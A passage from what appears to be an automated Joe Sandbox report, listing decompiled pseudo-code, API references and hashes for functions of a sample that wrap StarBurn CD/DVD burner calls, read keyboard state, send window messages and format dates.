      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Delete
      • String ID: P;B
      • API String ID: 1035893169-933050406
      • Opcode ID: f3b8355d58d3c00a084bfce6db8ec6833bbc41ccdf93afec228cd5781de190da
      • Instruction ID: 81d3044a3e4a01bd40b3398aa3727effb27b7a822c1a31dc278907b68eb3dad7
      • Opcode Fuzzy Hash: f3b8355d58d3c00a084bfce6db8ec6833bbc41ccdf93afec228cd5781de190da
      • Instruction Fuzzy Hash: 713170347046209FC720EB2AE841A1BB7F9AF897107E546BEB849D3751DB39EC058A1C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004823E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
      Download Yara Rule
      C-Code - Quality: 75%
      			E004823E8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				intOrPtr* _t45;
				intOrPtr _t58;
				char _t64;
				intOrPtr _t84;
				intOrPtr* _t87;
				intOrPtr _t102;
				intOrPtr _t108;
				intOrPtr _t111;
				void* _t112;
				void* _t114;

				_v12 = 0;
				_v8 = 0;
				_t87 = __eax;
				 *[fs:eax] = _t114 + 0xffffffe0;
				_t45 =  *0x48f84c; // 0x490c48
				E0047FAFC( *_t45, 0x64);
				E00409668(0x3b2b,  &_v8);
				E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 4, _v8);
				 *((intOrPtr*)( *_t87 + 0x14))( *[fs:eax], 0x482527, _t114, __edi, __esi, __ebx, _t112);
				_t58 =  *0x490c50; // 0x0
				E0047FD7C(_t58, _t87, 0, "CdvdBurnerGrabber_CloseSession", __edi,  *_t87, __fp0);
				_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18));
				_push(_t111 + 0x4e8);
				_push(_t111 + 0xe4);
				_push(0x400);
				_push(_t111 + 0xe8);
				_t64 =  *((intOrPtr*)(_t111 + 0xd8));
				_push(_t64);
				L00465E7C();
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18));
				 *((char*)(_t108 + 0xe0)) = _t64;
				if( *( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 0xe0) != 0) {
					_v36 =  *( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 0xe0) & 0x000000ff;
					_v32 = 0;
					_v28 =  *((intOrPtr*)(_t108 + 0xe4));
					_v24 = 0;
					_v20 = _t108 + 0xe8;
					_v16 = 6;
					E0040A164("StarBurn_CdvdBurnerGrabber_CloseSession() failed, exception %d, status %d, text \"%s\"\\n", 2,  &_v36,  &_v12);
					E00404A94( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 4, _v12);
					_t84 =  *0x490c50; // 0x0
					E0047FD7C(_t84, _t87, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x10)) + 0x18)) + 4)), _t108, _t111, __fp0);
				}
				_pop(_t102);
				 *[fs:eax] = _t102;
				_push(0x48252e);
				return E00404A64( &_v12, 2);
			}





















      0x004823f3
      0x004823f6
      0x004823f9
      0x00482406
      0x00482409
      0x00482415
      0x00482422
      0x00482433
      0x00482447
      0x00482451
      0x00482456
      0x0048245e
      0x00482467
      0x0048246e
      0x0048246f
      0x0048247a
      0x0048247b
      0x00482481
      0x00482482
      0x0048248a
      0x0048248d
      0x004824a0
      0x004824b3
      0x004824b6
      0x004824c0
      0x004824c3
      0x004824cd
      0x004824d0
      0x004824e1
      0x004824f2
      0x00482502
      0x00482507
      0x00482507
      0x0048250e
      0x00482511
      0x00482514
      0x00482526

      APIs
      • StarBurn_CdvdBurnerGrabber_CloseSession.STARBURN(?,?,00000400,?,?), ref: 00482482
      Strings
      • StarBurn_CdvdBurnerGrabber_CloseSession() failed, exception %d, status %d, text "%s"\n, xrefs: 004824DC
      • CdvdBurnerGrabber_CloseSession, xrefs: 0048244C
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_BurnerCdvdCloseGrabber_SessionStar
      • String ID: CdvdBurnerGrabber_CloseSession$StarBurn_CdvdBurnerGrabber_CloseSession() failed, exception %d, status %d, text "%s"\n
      • API String ID: 487153683-1136846341
      • Opcode ID: f7be73a541ed10ab19f976354792e318791e09665d19e505704e5457b42c8a52
      • Instruction ID: 5d0d54d665e4d5644b5300cbcd4afb509acf91d020b014e96ec73f10926756af
      • Opcode Fuzzy Hash: f7be73a541ed10ab19f976354792e318791e09665d19e505704e5457b42c8a52
      • Instruction Fuzzy Hash: 72413B746006449FDB08DF69C481B9AB7F4FF48304F1189AAE909EB362D774ED44CBA4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00457EF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
      Download Yara Rule
      C-Code - Quality: 73%
      			E00457EF8(intOrPtr __eax, void* __ecx, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t59;
				intOrPtr _t65;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				intOrPtr _t73;

				_t53 = __ecx;
				_t70 = _t72;
				_t73 = _t72 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x490b70; // 0x2480da8
					E0042CE2C(_t34, _t53,  &_v24);
					_push(_t70);
					_push(0x457ff6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t73;
					while(1) {
						_v17 = 0;
						_v8 = E00457BFC(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t65);
							_pop(_t56);
							 *[fs:eax] = _t65;
							_push(0x457ffd);
							_t40 =  *0x490b70; // 0x2480da8
							return E0042CE18(_t40, _t56);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x490b70; // 0x2480da8
					E0042CE2C(_t42, 2,  &_v8);
					_push(_t70);
					_push( *[fs:eax]);
					 *[fs:eax] = _t73;
					_v17 = E00457DA4( &_v8, 0, _t70);
					_pop(_t68);
					_t59 = 0x457fcb;
					 *[fs:eax] = _t68;
					_push(0x457fd2);
					_t48 =  *0x490b70; // 0x2480da8
					return E0042CE18(_t48, _t59);
				}
				L14:
			}





















      0x00457ef8
      0x00457ef9
      0x00457efb
      0x00457eff
      0x00457f01
      0x00457f0b
      0x00457f14
      0x00458013
      0x00457f1a
      0x00457f24
      0x00457f26
      0x00457f26
      0x00457f36
      0x00457f38
      0x00457f38
      0x00457f42
      0x00457f44
      0x00457f44
      0x00457f50
      0x00457f56
      0x00457f5b
      0x00457f62
      0x00457f63
      0x00457f68
      0x00457f6b
      0x00457f6e
      0x00457f6e
      0x00457f80
      0x00457f87
      0x00000000
      0x00000000
      0x00457fd6
      0x00457fe0
      0x00457fe2
      0x00457fe3
      0x00457fe6
      0x00457feb
      0x00457ff5
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00457fd6
      0x00457f8c
      0x00457f91
      0x00457f98
      0x00457f9e
      0x00457fa1
      0x00457fb0
      0x00457fb5
      0x00457fb7
      0x00457fb8
      0x00457fbb
      0x00457fc0
      0x00457fca
      0x00457fca
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: State
      • String ID:
      • API String ID: 1649606143-3916222277
      • Opcode ID: 8fa8b146ecb80273c31dbc0b0b139a7ee122f0438dbf271a412a636a48374a68
      • Instruction ID: 4d3d525132fe02906f57321bbb059df692b0ea43ed6aee37409f354fac11ccbd
      • Opcode Fuzzy Hash: 8fa8b146ecb80273c31dbc0b0b139a7ee122f0438dbf271a412a636a48374a68
      • Instruction Fuzzy Hash: 8531E535A0C608EFDB11DBA9E8516ADB7F5EF48304F5184BBEC00A7292E7785E04C669
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00472C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON
      Download Yara Rule
      C-Code - Quality: 73%
      			E00472C5C(intOrPtr __eax, void* __ebx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				intOrPtr _t31;
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t56;
				int _t57;
				intOrPtr _t64;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffffe0;
				_v36 = 0;
				_t56 = __edx;
				_v8 = __eax;
				_push(_t68);
				_push(0x472d5d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				_t31 =  *((intOrPtr*)(_v8 + 0x18));
				if(_t31 == 0) {
					_v20 = E00403BC0(1);
				} else {
					_v20 = _t31;
				}
				_v12 = _t56;
				_v16 = _v20;
				_push(_t68);
				_push(0x472d40);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				_v32 =  &_v16;
				_v24 = E0047299C;
				_v28 = 0;
				if( *((char*)(_v8 + 0x14)) == 0) {
					_t57 = 2;
				} else {
					_t57 = 1;
				}
				SendMessageA(E0044B158( *((intOrPtr*)(_v8 + 0x10))), 0x44a, _t57,  &_v32);
				if(_v28 != 0) {
					_t51 =  *0x48f558; // 0x466c70
					E00406A3C(_t51, 0,  &_v36);
					E0040CBEC(_v36, 1);
					E004043D0();
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x472d47);
				_t48 = _v8;
				if( *((intOrPtr*)(_t48 + 0x18)) == 0) {
					return E00403BF0(_v20);
				}
				return _t48;
			}




















      0x00472c5d
      0x00472c5f
      0x00472c65
      0x00472c68
      0x00472c6a
      0x00472c6f
      0x00472c70
      0x00472c75
      0x00472c78
      0x00472c7e
      0x00472c83
      0x00472c9d
      0x00472c85
      0x00472c85
      0x00472c85
      0x00472ca0
      0x00472ca6
      0x00472cab
      0x00472cac
      0x00472cb1
      0x00472cb4
      0x00472cba
      0x00472cc2
      0x00472cc7
      0x00472cd1
      0x00472cda
      0x00472cd3
      0x00472cd3
      0x00472cd3
      0x00472cf5
      0x00472cfe
      0x00472d03
      0x00472d08
      0x00472d17
      0x00472d1c
      0x00472d1c
      0x00472d23
      0x00472d26
      0x00472d29
      0x00472d2e
      0x00472d35
      0x00000000
      0x00472d3a
      0x00472d3f

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID: TsA$plF
      • API String ID: 3850602802-2407894139
      • Opcode ID: c5de53af42f093df29b3229f135aae2e395e54f57386b0bcf413a0472f189094
      • Instruction ID: 99d74facfabb791e8234d1e0b373a51ecaaf0135dc5bbbc03565ca85f40ff521
      • Opcode Fuzzy Hash: c5de53af42f093df29b3229f135aae2e395e54f57386b0bcf413a0472f189094
      • Instruction Fuzzy Hash: 82312A70A04208DFDB15DFA9C991AEEB7F9EB08304F51847AE804E7391D378AE40DB58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040B16C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
      Download Yara Rule
      C-Code - Quality: 72%
      			E0040B16C(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x40b24a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00404A40(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00404AD8( &_v8, 0x40b26c);
				} else {
					E00404AD8( &_v8, 0x40b260);
				}
				_t32 = E00404F00(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00404CB0(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00404F60( *_t49, E00404D00( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E0040B251);
				return E00404A40( &_v8);
			}













      0x0040b179
      0x0040b17c
      0x0040b17e
      0x0040b182
      0x0040b183
      0x0040b188
      0x0040b18b
      0x0040b190
      0x0040b19c
      0x0040b1a7
      0x0040b1b2
      0x0040b1b9
      0x0040b1d2
      0x0040b1bb
      0x0040b1c3
      0x0040b1c3
      0x0040b1e6
      0x0040b1ff
      0x0040b20e
      0x0040b214
      0x0040b22f
      0x0040b22f
      0x0040b214
      0x0040b236
      0x0040b239
      0x0040b23c
      0x0040b249

      APIs
      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B24A), ref: 0040B1F2
      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B24A), ref: 0040B1F8
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: DateFormatLocaleThread
      • String ID: yyyy
      • API String ID: 3303714858-3145165042
      • Opcode ID: 7394044a764889e73c70c8f39c9455ce97186d1c013f34385f4049e8c563a289
      • Instruction ID: 726c8018816bf8a90a038004f829d2eb04d24c23c4fd45e79bdfeee3bccf8b85
      • Opcode Fuzzy Hash: 7394044a764889e73c70c8f39c9455ce97186d1c013f34385f4049e8c563a289
      • Instruction Fuzzy Hash: 282144746042089FDB01EB65D846A9E73A8EF88700F5140BAFA05F77D1D7789E40CBAD
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00481C48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
      Download Yara Rule
      C-Code - Quality: 63%
      			E00481C48(void* __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _t39;
				intOrPtr _t43;
				char _t48;
				intOrPtr _t58;
				void* _t66;
				void* _t69;

				_t76 = __fp0;
				_t64 = __edi;
				_push(__ebx);
				_v8 = 0;
				_t66 = __eax;
				_push(_t69);
				_push(0x481d3a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t69 + 0xffffffe4;
				 *((char*)(__eax + 0xe0)) = 0;
				if( *((intOrPtr*)(__eax + 0xd8)) != 0) {
					_t43 =  *0x490c50; // 0x0
					E0047FD7C(_t43, __ebx, 0, "CdvdBurnerGrabber_Lock", __edi, __eax, __fp0);
					_push(_t66 + 0x4e8);
					_push(_t66 + 0xe4);
					_push(0x400);
					_push(_t66 + 0xe8);
					_t48 =  *((intOrPtr*)(_t66 + 0xd8));
					_push(_t48);
					L00465E8C();
					 *((char*)(_t66 + 0xe0)) = _t48;
				}
				_t50 =  *((intOrPtr*)(_t66 + 0xe0));
				if( *((intOrPtr*)(_t66 + 0xe0)) != 0) {
					_v32 = 0;
					_v28 = 0;
					_v24 =  *((intOrPtr*)(_t66 + 0xe4));
					_v20 = 0;
					_v16 = _t66 + 0xe8;
					_v12 = 6;
					E0040A164("StarBurn_CdvdBurnerGrabber_Lock() failed, exception %d, status %d, text \"%s\"\\n", 2,  &_v32,  &_v8);
					E00404A94(_t66 + 4, _v8);
					_t39 =  *0x490c50; // 0x0
					E0047FD7C(_t39, _t50, 0,  *((intOrPtr*)(_t66 + 4)), _t64, _t66, _t76);
					E0043DCAC(0);
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(0x481d41);
				return E00404A40( &_v8);
			}
















      0x00481c48
      0x00481c48
      0x00481c4e
      0x00481c52
      0x00481c55
      0x00481c59
      0x00481c5a
      0x00481c5f
      0x00481c62
      0x00481c65
      0x00481c73
      0x00481c7c
      0x00481c81
      0x00481c8c
      0x00481c93
      0x00481c94
      0x00481c9f
      0x00481ca0
      0x00481ca6
      0x00481ca7
      0x00481cac
      0x00481cac
      0x00481cb2
      0x00481cba
      0x00481cc4
      0x00481cc7
      0x00481cd1
      0x00481cd4
      0x00481cde
      0x00481ce1
      0x00481cf2
      0x00481cfd
      0x00481d07
      0x00481d0c
      0x00481d1f
      0x00481d1f
      0x00481d26
      0x00481d29
      0x00481d2c
      0x00481d39

      APIs
      • StarBurn_CdvdBurnerGrabber_Lock.STARBURN(00000000,?,00000400,?,?,00000000,00481D3A), ref: 00481CA7
      Strings
      • StarBurn_CdvdBurnerGrabber_Lock() failed, exception %d, status %d, text "%s"\n, xrefs: 00481CED
      • CdvdBurnerGrabber_Lock, xrefs: 00481C77
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_BurnerCdvdGrabber_LockStar
      • String ID: CdvdBurnerGrabber_Lock$StarBurn_CdvdBurnerGrabber_Lock() failed, exception %d, status %d, text "%s"\n
      • API String ID: 2715423426-2712867585
      • Opcode ID: d790bbaf1ded93fabbb57ed30ada9169490d11b60312f066c440a5672fd9e236
      • Instruction ID: ea7429df3c935f8aee7207ffbee2362b5feb0ade4ab6996301024955729a3efe
      • Opcode Fuzzy Hash: d790bbaf1ded93fabbb57ed30ada9169490d11b60312f066c440a5672fd9e236
      • Instruction Fuzzy Hash: 4C216B70604A849FD711DB78C841BDFB7E8AB49304F10887FE59AE7291D778BA05CB68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00481DC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
      Download Yara Rule
      C-Code - Quality: 63%
      			E00481DC4(void* __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _t39;
				intOrPtr _t43;
				char _t48;
				intOrPtr _t58;
				void* _t66;
				void* _t69;

				_t76 = __fp0;
				_t64 = __edi;
				_push(__ebx);
				_v8 = 0;
				_t66 = __eax;
				_push(_t69);
				_push(0x481eb6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t69 + 0xffffffe4;
				 *((char*)(__eax + 0xe0)) = 0;
				if( *((intOrPtr*)(__eax + 0xd8)) != 0) {
					_t43 =  *0x490c50; // 0x0
					E0047FD7C(_t43, __ebx, 0, "CdvdBurnerGrabber_Release", __edi, __eax, __fp0);
					_push(_t66 + 0x4e8);
					_push(_t66 + 0xe4);
					_push(0x400);
					_push(_t66 + 0xe8);
					_t48 =  *((intOrPtr*)(_t66 + 0xd8));
					_push(_t48);
					L00465E94();
					 *((char*)(_t66 + 0xe0)) = _t48;
				}
				_t50 =  *((intOrPtr*)(_t66 + 0xe0));
				if( *((intOrPtr*)(_t66 + 0xe0)) != 0) {
					_v32 = 0;
					_v28 = 0;
					_v24 =  *((intOrPtr*)(_t66 + 0xe4));
					_v20 = 0;
					_v16 = _t66 + 0xe8;
					_v12 = 6;
					E0040A164("StarBurn_CdvdBurnerGrabber_Release() failed, exception %d, status %d, text \"%s\"\\n", 2,  &_v32,  &_v8);
					E00404A94(_t66 + 4, _v8);
					_t39 =  *0x490c50; // 0x0
					E0047FD7C(_t39, _t50, 0,  *((intOrPtr*)(_t66 + 4)), _t64, _t66, _t76);
					E0043DCAC(0);
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(0x481ebd);
				return E00404A40( &_v8);
			}
















      0x00481dc4
      0x00481dc4
      0x00481dca
      0x00481dce
      0x00481dd1
      0x00481dd5
      0x00481dd6
      0x00481ddb
      0x00481dde
      0x00481de1
      0x00481def
      0x00481df8
      0x00481dfd
      0x00481e08
      0x00481e0f
      0x00481e10
      0x00481e1b
      0x00481e1c
      0x00481e22
      0x00481e23
      0x00481e28
      0x00481e28
      0x00481e2e
      0x00481e36
      0x00481e40
      0x00481e43
      0x00481e4d
      0x00481e50
      0x00481e5a
      0x00481e5d
      0x00481e6e
      0x00481e79
      0x00481e83
      0x00481e88
      0x00481e9b
      0x00481e9b
      0x00481ea2
      0x00481ea5
      0x00481ea8
      0x00481eb5

      APIs
      • StarBurn_CdvdBurnerGrabber_Release.STARBURN(00000000,0048172F,00000400,00000000,?,00000000,00481EB6), ref: 00481E23
      Strings
      • StarBurn_CdvdBurnerGrabber_Release() failed, exception %d, status %d, text "%s"\n, xrefs: 00481E69
      • CdvdBurnerGrabber_Release, xrefs: 00481DF3
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_BurnerCdvdGrabber_ReleaseStar
      • String ID: CdvdBurnerGrabber_Release$StarBurn_CdvdBurnerGrabber_Release() failed, exception %d, status %d, text "%s"\n
      • API String ID: 216732225-111072396
      • Opcode ID: d50bdebe7711ede4e135d3dae4bfe032e4449a2f7e11e5801d3bd7d0e145ccef
      • Instruction ID: 0536b803b048c61647dc510b7b9694a0fde26dd8f3c18ed264dc2f75cc415e1f
      • Opcode Fuzzy Hash: d50bdebe7711ede4e135d3dae4bfe032e4449a2f7e11e5801d3bd7d0e145ccef
      • Instruction Fuzzy Hash: D821A1706047849FC720DB74C841BEFB7E8AB49304F10887FE59AE7251D7786A05CB68
      Uniqueness

      Uniqueness Score: -1.00%

